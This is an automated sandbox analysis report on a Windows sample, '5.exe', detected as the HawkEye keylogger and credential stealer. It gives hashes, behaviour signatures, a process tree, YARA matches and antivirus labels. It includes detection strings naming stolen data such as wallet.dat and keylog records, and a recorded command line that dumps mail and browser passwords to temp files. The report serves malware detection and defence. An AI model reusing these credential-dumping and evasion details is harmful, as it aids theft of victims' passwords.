Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 5.exe

Overview

General Information

Sample Name:5.exe
Analysis ID:535767
MD5:3f332b62eee0970f3189c689d5bd042a
SHA1:f68f7dcc8ffcdd3f93333e711779e8d02db2dfae
SHA256:7c7983ada08828ea0c0ed5b17b05f8dad5bf6fa44e1a4692c37f18c340e14219
Tags:exeHawkeye
Infos:

Most interesting Screenshot:

Detection

HawkEye MailPassView
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected MailPassView
Yara detected HawkEye Keylogger
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected MSIL Injector
Detected HawkEye Rat
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Deletes itself after installation
Tries to harvest and steal browser information (history, passwords, etc)
Sample uses process hollowing technique
Installs a global keyboard hook
Writes to foreign memory regions
.NET source code references suspicious native API functions
Contains functionality to log keystrokes (.Net Source)
Changes the view of files in windows explorer (hidden files and folders)
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Yara detected WebBrowserPassView password recovery tool
Machine Learning detection for dropped file
Tries to steal Instant Messenger accounts or passwords
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Launches processes in debugging mode, may be used to hinder debugging
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
May infect USB drives
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Social media urls found in memory data
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • 5.exe (PID: 1928 cmdline: "C:\Users\user\Desktop\5.exe" MD5: 3F332B62EEE0970F3189C689D5BD042A)
    • 5.exe (PID: 1060 cmdline: "C:\Users\user\Desktop\5.exe" MD5: 3F332B62EEE0970F3189C689D5BD042A)
      • Windows Update.exe (PID: 5844 cmdline: "C:\Users\user\AppData\Roaming\Windows Update.exe" MD5: 3F332B62EEE0970F3189C689D5BD042A)
        • Windows Update.exe (PID: 6244 cmdline: "C:\Users\user\AppData\Roaming\Windows Update.exe" MD5: 3F332B62EEE0970F3189C689D5BD042A)
          • dw20.exe (PID: 6640 cmdline: dw20.exe -x -s 2128 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
          • vbc.exe (PID: 6716 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt" MD5: C63ED21D5706A527419C9FBD730FFB2E)
          • vbc.exe (PID: 6736 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt" MD5: C63ED21D5706A527419C9FBD730FFB2E)
          • WerFault.exe (PID: 7152 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6244 -s 2128 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
          • WerFault.exe (PID: 3456 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6244 -s 2128 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • WindowsUpdate.exe (PID: 7036 cmdline: "C:\Users\user\AppData\Roaming\WindowsUpdate.exe" MD5: 3F332B62EEE0970F3189C689D5BD042A)
    • WindowsUpdate.exe (PID: 4320 cmdline: "C:\Users\user\AppData\Roaming\WindowsUpdate.exe" MD5: 3F332B62EEE0970F3189C689D5BD042A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.391527665.00000000075C0000.00000004.00020000.sdmpHKTL_NET_GUID_StealerDetects c# red/black-team tools via typelibguidArnim Rupp
  • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
0000000F.00000000.330182095.0000000000400000.00000040.00000001.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
    0000000A.00000000.357304833.00000000075C0000.00000004.00020000.sdmpHKTL_NET_GUID_StealerDetects c# red/black-team tools via typelibguidArnim Rupp
    • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
    00000010.00000000.331574384.0000000000400000.00000040.00000001.sdmpJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
      00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmpRAT_HawkEyeDetects HawkEye RATKevin Breen <kevin@techanarchy.net>
      • 0x8ccca:$key: HawkEyeKeylogger
      • 0x8ef2c:$salt: 099u787978786
      • 0x8d30b:$string1: HawkEye_Keylogger
      • 0x8e15e:$string1: HawkEye_Keylogger
      • 0x8ee8c:$string1: HawkEye_Keylogger
      • 0x8d6f4:$string2: holdermail.txt
      • 0x8d714:$string2: holdermail.txt
      • 0x8d636:$string3: wallet.dat
      • 0x8d64e:$string3: wallet.dat
      • 0x8d664:$string3: wallet.dat
      • 0x8ea50:$string4: Keylog Records
      • 0x8ed68:$string4: Keylog Records
      • 0x8ef84:$string5: do not script -->
      • 0x8ccb2:$string6: \pidloc.txt
      • 0x8cd40:$string7: BSPLIT
      • 0x8cd50:$string7: BSPLIT
      Click to see the 229 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      10.0.Windows Update.exe.4b3fa72.56.raw.unpackRAT_HawkEyeDetects HawkEye RATKevin Breen <kevin@techanarchy.net>
      • 0x1dc00:$key: HawkEyeKeylogger
      • 0x1fe62:$salt: 099u787978786
      • 0x1e241:$string1: HawkEye_Keylogger
      • 0x1f094:$string1: HawkEye_Keylogger
      • 0x1fdc2:$string1: HawkEye_Keylogger
      • 0x1e62a:$string2: holdermail.txt
      • 0x1e64a:$string2: holdermail.txt
      • 0x1e56c:$string3: wallet.dat
      • 0x1e584:$string3: wallet.dat
      • 0x1e59a:$string3: wallet.dat
      • 0x1f986:$string4: Keylog Records
      • 0x1fc9e:$string4: Keylog Records
      • 0x1feba:$string5: do not script -->
      • 0x1dbe8:$string6: \pidloc.txt
      • 0x1dc76:$string7: BSPLIT
      • 0x1dc86:$string7: BSPLIT
      10.0.Windows Update.exe.4b3fa72.56.raw.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
        10.0.Windows Update.exe.4b3fa72.56.raw.unpackJoeSecurity_HawkEyeYara detected HawkEye KeyloggerJoe Security
          10.0.Windows Update.exe.4b3fa72.56.raw.unpackHawkeyedetect HawkEye in memoryJPCERT/CC Incident Response Group
          • 0x1e299:$hawkstr1: HawkEye Keylogger
          • 0x1f0da:$hawkstr1: HawkEye Keylogger
          • 0x1f409:$hawkstr1: HawkEye Keylogger
          • 0x1f564:$hawkstr1: HawkEye Keylogger
          • 0x1f6c7:$hawkstr1: HawkEye Keylogger
          • 0x1f95e:$hawkstr1: HawkEye Keylogger
          • 0x1de27:$hawkstr2: Dear HawkEye Customers!
          • 0x1f45c:$hawkstr2: Dear HawkEye Customers!
          • 0x1f5b3:$hawkstr2: Dear HawkEye Customers!
          • 0x1f71a:$hawkstr2: Dear HawkEye Customers!
          • 0x1df48:$hawkstr3: HawkEye Logger Details:
          2.2.5.exe.4a5dc92.9.raw.unpackRAT_HawkEyeDetects HawkEye RATKevin Breen <kevin@techanarchy.net>
          • 0x1dc00:$key: HawkEyeKeylogger
          • 0x1fe62:$salt: 099u787978786
          • 0x1e241:$string1: HawkEye_Keylogger
          • 0x1f094:$string1: HawkEye_Keylogger
          • 0x1fdc2:$string1: HawkEye_Keylogger
          • 0x1e62a:$string2: holdermail.txt
          • 0x1e64a:$string2: holdermail.txt
          • 0x1e56c:$string3: wallet.dat
          • 0x1e584:$string3: wallet.dat
          • 0x1e59a:$string3: wallet.dat
          • 0x1f986:$string4: Keylog Records
          • 0x1fc9e:$string4: Keylog Records
          • 0x1feba:$string5: do not script -->
          • 0x1dbe8:$string6: \pidloc.txt
          • 0x1dc76:$string7: BSPLIT
          • 0x1dc86:$string7: BSPLIT
          Click to see the 865 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for submitted fileShow sources
          Source: 5.exeVirustotal: Detection: 41%Perma Link
          Source: 5.exeReversingLabs: Detection: 31%
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nsw2209.tmp\rgsbzeog.dllReversingLabs: Detection: 33%
          Source: C:\Users\user\AppData\Local\Temp\nswBB9.tmp\rgsbzeog.dllReversingLabs: Detection: 33%
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeReversingLabs: Detection: 31%
          Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeReversingLabs: Detection: 31%
          Machine Learning detection for sampleShow sources
          Source: 5.exeJoe Sandbox ML: detected
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeJoe Sandbox ML: detected
          Source: 2.2.5.exe.415058.0.unpackAvira: Label: TR/Inject.vcoldi
          Source: 10.0.Windows Update.exe.38c3258.47.unpackAvira: Label: TR/Inject.vcoldi
          Source: 15.0.vbc.exe.400000.4.unpackAvira: Label: SPR/Tool.MailPassView.473
          Source: 10.0.Windows Update.exe.415058.18.unpackAvira: Label: TR/Inject.vcoldi
          Source: 10.0.Windows Update.exe.38c3258.25.unpackAvira: Label: TR/Inject.vcoldi
          Source: 2.0.5.exe.400000.13.unpackAvira: Label: TR/AD.MExecute.lzrac
          Source: 2.0.5.exe.400000.13.unpackAvira: Label: SPR/Tool.MailPassView.473
          Source: 2.0.5.exe.415058.16.unpackAvira: Label: TR/Inject.vcoldi
          Source: 10.0.Windows Update.exe.400000.4.unpackAvira: Label: TR/AD.MExecute.lzrac
          Source: 10.0.Windows Update.exe.400000.4.unpackAvira: Label: SPR/Tool.MailPassView.473
          Source: 2.0.5.exe.400000.5.unpackAvira: Label: TR/AD.MExecute.lzrac
          Source: 2.0.5.exe.400000.5.unpackAvira: Label: SPR/Tool.MailPassView.473
          Source: 10.0.Windows Update.exe.400000.6.unpackAvira: Label: TR/AD.MExecute.lzrac
          Source: 10.0.Windows Update.exe.400000.6.unpackAvira: Label: SPR/Tool.MailPassView.473
          Source: 15.0.vbc.exe.400000.2.unpackAvira: Label: SPR/Tool.MailPassView.473
          Source: 10.2.Windows Update.exe.400000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
          Source: 10.2.Windows Update.exe.400000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
          Source: 15.0.vbc.exe.400000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
          Source: 10.0.Windows Update.exe.400000.7.unpackAvira: Label: TR/AD.MExecute.lzrac
          Source: 10.0.Windows Update.exe.400000.7.unpackAvira: Label: SPR/Tool.MailPassView.473
          Source: 10.0.Windows Update.exe.4a50000.52.unpackAvira: Label: TR/Inject.vcoldi
          Source: 10.0.Windows Update.exe.400000.13.unpackAvira: Label: TR/AD.MExecute.lzrac
          Source: 10.0.Windows Update.exe.400000.13.unpackAvira: Label: SPR/Tool.MailPassView.473
          Source: 6.2.Windows Update.exe.147a0000.1.unpackAvira: Label: TR/Inject.vcoldi
          Source: 2.0.5.exe.400000.7.unpackAvira: Label: TR/AD.MExecute.lzrac
          Source: 2.0.5.exe.400000.7.unpackAvira: Label: SPR/Tool.MailPassView.473
          Source: 10.0.Windows Update.exe.400000.5.unpackAvira: Label: TR/AD.MExecute.lzrac
          Source: 10.0.Windows Update.exe.400000.5.unpackAvira: Label: SPR/Tool.MailPassView.473
          Source: 10.0.Windows Update.exe.400000.8.unpackAvira: Label: TR/AD.MExecute.lzrac
          Source: 10.0.Windows Update.exe.400000.8.unpackAvira: Label: SPR/Tool.MailPassView.473
          Source: 2.0.5.exe.400000.9.unpackAvira: Label: TR/AD.MExecute.lzrac
          Source: 2.0.5.exe.400000.9.unpackAvira: Label: SPR/Tool.MailPassView.473
          Source: 1.2.5.exe.148b1458.4.unpackAvira: Label: TR/Inject.vcoldi
          Source: 10.2.Windows Update.exe.38c3258.7.unpackAvira: Label: TR/Inject.vcoldi
          Source: 2.0.5.exe.400000.8.unpackAvira: Label: TR/AD.MExecute.lzrac
          Source: 2.0.5.exe.400000.8.unpackAvira: Label: SPR/Tool.MailPassView.473
          Source: 10.1.Windows Update.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
          Source: 10.1.Windows Update.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
          Source: 2.2.5.exe.3863258.6.unpackAvira: Label: TR/Inject.vcoldi
          Source: 10.0.Windows Update.exe.400000.19.unpackAvira: Label: TR/AD.MExecute.lzrac
          Source: 10.0.Windows Update.exe.400000.19.unpackAvira: Label: SPR/Tool.MailPassView.473
          Source: 10.2.Windows Update.exe.415058.2.unpackAvira: Label: TR/Inject.vcoldi
          Source: 2.2.5.exe.4a90000.12.unpackAvira: Label: TR/Inject.vcoldi
          Source: 10.2.Windows Update.exe.4a50000.15.unpackAvira: Label: TR/Inject.vcoldi
          Source: 15.0.vbc.exe.400000.1.unpackAvira: Label: SPR/Tool.MailPassView.473
          Source: 2.1.5.exe.415058.3.unpackAvira: Label: TR/Inject.vcoldi
          Source: 2.0.5.exe.400000.4.unpackAvira: Label: TR/AD.MExecute.lzrac
          Source: 2.0.5.exe.400000.4.unpackAvira: Label: SPR/Tool.MailPassView.473
          Source: 10.0.Windows Update.exe.415058.41.unpackAvira: Label: TR/Inject.vcoldi
          Source: 10.0.Windows Update.exe.400000.9.unpackAvira: Label: TR/AD.MExecute.lzrac
          Source: 10.0.Windows Update.exe.400000.9.unpackAvira: Label: SPR/Tool.MailPassView.473
          Source: 10.0.Windows Update.exe.4a50000.30.unpackAvira: Label: TR/Inject.vcoldi
          Source: 10.0.Windows Update.exe.4ae0000.33.unpackAvira: Label: TR/AD.MExecute.lzrac
          Source: 10.0.Windows Update.exe.4ae0000.33.unpackAvira: Label: SPR/Tool.MailPassView.473
          Source: 6.2.Windows Update.exe.147b1458.4.unpackAvira: Label: TR/Inject.vcoldi
          Source: 2.0.5.exe.400000.6.unpackAvira: Label: TR/AD.MExecute.lzrac
          Source: 2.0.5.exe.400000.6.unpackAvira: Label: SPR/Tool.MailPassView.473
          Source: 10.1.Windows Update.exe.415058.1.unpackAvira: Label: TR/Inject.vcoldi
          Source: 1.2.5.exe.148a0000.1.unpackAvira: Label: TR/Inject.vcoldi
          Source: 15.0.vbc.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
          Source: 10.2.Windows Update.exe.4ae0000.16.unpackAvira: Label: TR/AD.MExecute.lzrac
          Source: 10.2.Windows Update.exe.4ae0000.16.unpackAvira: Label: SPR/Tool.MailPassView.473
          Source: 10.0.Windows Update.exe.415058.14.unpackAvira: Label: TR/Inject.vcoldi
          Source: 10.0.Windows Update.exe.4ae0000.55.unpackAvira: Label: TR/AD.MExecute.lzrac
          Source: 10.0.Windows Update.exe.4ae0000.55.unpackAvira: Label: SPR/Tool.MailPassView.473
          Source: 2.2.5.exe.4b20000.15.unpackAvira: Label: TR/AD.MExecute.lzrac
          Source: 2.2.5.exe.4b20000.15.unpackAvira: Label: SPR/Tool.MailPassView.473
          Source: 2.1.5.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
          Source: 2.1.5.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
          Source: 2.2.5.exe.400000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
          Source: 2.2.5.exe.400000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
          Source: 2.0.5.exe.415058.12.unpackAvira: Label: TR/Inject.vcoldi
          Source: 10.0.Windows Update.exe.415058.12.unpackAvira: Label: TR/Inject.vcoldi
          Source: 10.0.Windows Update.exe.400000.40.unpackAvira: Label: TR/AD.MExecute.lzrac
          Source: 10.0.Windows Update.exe.400000.40.unpackAvira: Label: SPR/Tool.MailPassView.473
          Source: 5.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: C:\Users\user\Desktop\5.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
          Source: Binary string: mscorlib.pdbHrs source: Windows Update.exe, 0000000A.00000000.356541770.0000000006F8A000.00000004.00000010.sdmp, Windows Update.exe, 0000000A.00000002.390762786.0000000006F8A000.00000004.00000010.sdmp
          Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: Windows Update.exe, 0000000A.00000002.385169894.0000000000AD7000.00000004.00000040.sdmp, Windows Update.exe, 0000000A.00000000.351921404.0000000000AD7000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.pdb source: Windows Update.exe, 0000000A.00000000.356541770.0000000006F8A000.00000004.00000010.sdmp, Windows Update.exe, 0000000A.00000002.390762786.0000000006F8A000.00000004.00000010.sdmp, Windows Update.exe, 0000000A.00000002.385169894.0000000000AD7000.00000004.00000040.sdmp, Windows Update.exe, 0000000A.00000000.351921404.0000000000AD7000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: Windows Update.exe, 0000000A.00000000.343602667.000000000083F000.00000004.00000020.sdmp
          Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: Windows Update.exe, Windows Update.exe, 0000000A.00000002.391527665.00000000075C0000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000002.386168865.00000000028C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.352528568.00000000028C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.344665694.00000000028C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 5.exe, 00000001.00000003.263698625.0000000014AD0000.00000004.00000001.sdmp, 5.exe, 00000001.00000003.263528153.0000000014940000.00000004.00000001.sdmp, Windows Update.exe, 00000006.00000003.303805285.00000000149D0000.00000004.00000001.sdmp, Windows Update.exe, 00000006.00000003.300117905.0000000014840000.00000004.00000001.sdmp
          Source: Binary string: C:\Windows\assembly\GA.pdbmscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll source: Windows Update.exe, 0000000A.00000000.356541770.0000000006F8A000.00000004.00000010.sdmp, Windows Update.exe, 0000000A.00000002.390762786.0000000006F8A000.00000004.00000010.sdmp
          Source: Binary string: wntdll.pdb source: 5.exe, 00000001.00000003.263698625.0000000014AD0000.00000004.00000001.sdmp, 5.exe, 00000001.00000003.263528153.0000000014940000.00000004.00000001.sdmp, Windows Update.exe, 00000006.00000003.303805285.00000000149D0000.00000004.00000001.sdmp, Windows Update.exe, 00000006.00000003.300117905.0000000014840000.00000004.00000001.sdmp
          Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: Windows Update.exe, 0000000A.00000002.385169894.0000000000AD7000.00000004.00000040.sdmp, Windows Update.exe, 0000000A.00000000.351921404.0000000000AD7000.00000004.00000040.sdmp
          Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: Windows Update.exe, Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, vbc.exe, vbc.exe, 0000000F.00000000.330182095.0000000000400000.00000040.00000001.sdmp, vbc.exe, 0000000F.00000000.329440107.0000000000400000.00000040.00000001.sdmp, vbc.exe, 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp
          Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdb source: Windows Update.exe, 0000000A.00000000.356541770.0000000006F8A000.00000004.00000010.sdmp, Windows Update.exe, 0000000A.00000002.390762786.0000000006F8A000.00000004.00000010.sdmp
          Source: Binary string: mscorlib.pdbAA source: Windows Update.exe, 0000000A.00000002.385169894.0000000000AD7000.00000004.00000040.sdmp, Windows Update.exe, 0000000A.00000000.351921404.0000000000AD7000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\dll\mscorlib.pdb source: Windows Update.exe, 0000000A.00000002.385169894.0000000000AD7000.00000004.00000040.sdmp, Windows Update.exe, 0000000A.00000000.351921404.0000000000AD7000.00000004.00000040.sdmp
          Source: Binary string: DDsymbols\dll\mscorlib.pdb source: Windows Update.exe, 0000000A.00000000.356541770.0000000006F8A000.00000004.00000010.sdmp, Windows Update.exe, 0000000A.00000002.390762786.0000000006F8A000.00000004.00000010.sdmp
          Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: Windows Update.exe, Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, vbc.exe, vbc.exe, 00000010.00000000.331574384.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000000.331207385.0000000000400000.00000040.00000001.sdmp
          Source: Binary string: C:\Windows\mscorlib.pdbf source: Windows Update.exe, 0000000A.00000002.385169894.0000000000AD7000.00000004.00000040.sdmp, Windows Update.exe, 0000000A.00000000.351921404.0000000000AD7000.00000004.00000040.sdmp
          Source: Binary string: oC:\Windows\mscorlib.pdb source: Windows Update.exe, 0000000A.00000000.356541770.0000000006F8A000.00000004.00000010.sdmp, Windows Update.exe, 0000000A.00000002.390762786.0000000006F8A000.00000004.00000010.sdmp
          Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: Windows Update.exe, 0000000A.00000002.385169894.0000000000AD7000.00000004.00000040.sdmp, Windows Update.exe, 0000000A.00000000.351921404.0000000000AD7000.00000004.00000040.sdmp
          Source: 5.exe, 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmpBinary or memory string: autorun.inf
          Source: 5.exe, 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmpBinary or memory string: [autorun]
          Source: 5.exeBinary or memory string: autorun.inf
          Source: 5.exeBinary or memory string: [autorun]
          Source: 5.exe, 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmpBinary or memory string: autorun.inf
          Source: 5.exe, 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmpBinary or memory string: [autorun]
          Source: 5.exe, 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmpBinary or memory string: autorun.inf
          Source: 5.exe, 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmpBinary or memory string: [autorun]
          Source: 5.exe, 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmpBinary or memory string: autorun.inf
          Source: 5.exe, 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmpBinary or memory string: [autorun]
          Source: 5.exe, 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmpBinary or memory string: autorun.inf
          Source: 5.exe, 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmpBinary or memory string: [autorun]
          Source: 5.exe, 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmpBinary or memory string: autorun.inf
          Source: 5.exe, 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmpBinary or memory string: [autorun]
          Source: 5.exe, 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmpBinary or memory string: autorun.inf
          Source: 5.exe, 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmpBinary or memory string: [autorun]
          Source: Windows Update.exe, 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmpBinary or memory string: autorun.inf
          Source: Windows Update.exe, 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmpBinary or memory string: [autorun]
          Source: Windows Update.exeBinary or memory string: autorun.inf
          Source: Windows Update.exeBinary or memory string: [autorun]
          Source: Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmpBinary or memory string: autorun.inf
          Source: Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmpBinary or memory string: [autorun]
          Source: Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmpBinary or memory string: autorun.inf
          Source: Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmpBinary or memory string: [autorun]
          Source: Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmpBinary or memory string: autorun.inf
          Source: Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmpBinary or memory string: [autorun]
          Source: Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmpBinary or memory string: autorun.inf
          Source: Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmpBinary or memory string: [autorun]
          Source: Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmpBinary or memory string: autorun.inf
          Source: Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmpBinary or memory string: [autorun]
          Source: Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmpBinary or memory string: autorun.inf
          Source: Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmpBinary or memory string: [autorun]
          Source: Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmpBinary or memory string: autorun.inf
          Source: Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmpBinary or memory string: [autorun]
          Source: C:\Users\user\Desktop\5.exeCode function: 1_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00405250
          Source: C:\Users\user\Desktop\5.exeCode function: 1_2_00405C22 FindFirstFileA,FindClose,1_2_00405C22
          Source: C:\Users\user\Desktop\5.exeCode function: 1_2_00402630 FindFirstFileA,1_2_00402630
          Source: C:\Users\user\Desktop\5.exeCode function: 2_2_00404A29 FindFirstFileExW,2_2_00404A29
          Source: C:\Users\user\Desktop\5.exeCode function: 2_1_00404A29 FindFirstFileExW,2_1_00404A29
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_2_00404A29 FindFirstFileExW,10_2_00404A29
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_1_00404A29 FindFirstFileExW,10_1_00404A29
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 15_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00406EC3
